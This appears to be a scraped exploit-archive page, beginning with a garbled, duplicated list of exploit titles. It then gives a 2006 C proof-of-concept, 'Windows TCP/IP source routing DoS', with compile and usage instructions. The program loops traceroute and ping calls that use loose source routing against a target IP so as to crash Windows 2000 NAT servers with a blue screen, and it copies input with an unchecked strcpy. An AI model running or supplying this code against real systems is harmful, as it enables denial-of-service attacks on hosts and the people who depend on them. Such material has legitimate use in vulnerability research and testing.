
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
132 lines
2.6 KiB
C
Executable file
132 lines
2.6 KiB
C
Executable file
/*
|
|
|
|
####################################
|
|
#
|
|
# Windows TCP/IP source routing poc
|
|
# C version...
|
|
#
|
|
# by Preddy
|
|
#
|
|
# RootShell Security Group
|
|
#
|
|
# Shoutz 2:
|
|
#
|
|
# Jimmy and ByteCoder +
|
|
# Rs Crew +
|
|
# Rest of the world :D
|
|
#
|
|
#
|
|
####################################
|
|
|
|
Compile:
|
|
|
|
gcc win-tcpip-dos.c -o wintcpipdos
|
|
|
|
Info:
|
|
|
|
Published: 14.06.2006
|
|
Source: ANDREYMINAEV
|
|
Type: remote
|
|
Level: 9/10
|
|
|
|
Buffer overflow on ICMP packets with
|
|
Loose Source and Record Route IP options.
|
|
Short message translation: There are DoS
|
|
conditions in Windows 2000 built-in NAT
|
|
server. Tested configuration: Windows 2000
|
|
English Standard/Advanced Service Pack 4
|
|
+ Update Rollup 1 for Service Pack 4 with
|
|
NAT server enabled. While routing packets
|
|
with options "Loose Source and Record Route"
|
|
defined by RFC 791 through server, Windows
|
|
crashes to BSOD with error in tcpip.sys or
|
|
ntoskrnl.exe, or system hangs or system
|
|
began instable work. It doesn't metter if
|
|
packets are from internal or external
|
|
networks. Use attached script to test
|
|
vulnerability. On Windows 2003 problem
|
|
doesn't present. It's also likely same
|
|
problem to present in Windows 2000 +
|
|
ISA 2000. Code execution is potentially possible.
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
|
|
|
|
main(int argc, char *argv[])
|
|
{
|
|
|
|
char dos_ip[255];
|
|
char mysystem[10];
|
|
char ping[20+1];
|
|
char trace[100];
|
|
|
|
|
|
if(argc != 3)
|
|
{
|
|
|
|
printf("\n\nWindows TCP/IP source routing Dos - by Preddy\n");
|
|
printf("Usage: %s <ip> <mysystem>\n", argv[0]);
|
|
printf("Example: %s 127.0.0.1 linux\n", argv[0]);
|
|
printf("Uses the ping and the traceroute utility on your system\n", argv[0]);
|
|
printf("Should cause a BSOD on the remote system\n");
|
|
printf("More info: http://www.security.nnov.ru/Fnews753.html\n\n");
|
|
exit(1);
|
|
}
|
|
|
|
strcpy(dos_ip, argv[1]);
|
|
strcpy(mysystem, argv[2]);
|
|
|
|
|
|
if((strcmp (argv[2],"linux"))==0)
|
|
{
|
|
|
|
printf("\nTarget: %s\n", dos_ip);
|
|
printf("MySystem: %s\n", mysystem);
|
|
printf("Sending Payload...\n\n");
|
|
|
|
|
|
strcpy(ping, "ping -c 1 ");
|
|
strncat(ping,argv[1],9);
|
|
|
|
strcpy(trace, "traceroute -m 1 -g 0.0.0.0 ");
|
|
strncat(trace,argv[1],9);
|
|
|
|
|
|
while(1)
|
|
{
|
|
system(trace);
|
|
system(ping);
|
|
}
|
|
|
|
}
|
|
|
|
if((strcmp (argv[2],"windows"))==0)
|
|
{
|
|
|
|
printf("Target: %s\n", dos_ip);
|
|
printf("MySystem: %s\n", mysystem);
|
|
printf("Sending Payload...\n");
|
|
|
|
|
|
strcpy(ping, "ping -n 1 ");
|
|
strncat(ping,argv[1],9);
|
|
|
|
strcpy(trace, "tracert -h 1 -j 0.0.0.0 ");
|
|
strncat(trace,argv[1],9);
|
|
|
|
|
|
while(1)
|
|
{
|
|
system(trace);
|
|
system(ping);
|
|
}
|
|
|
|
}
|
|
|
|
}
|
|
|
|
// milw0rm.com [2006-06-30]
|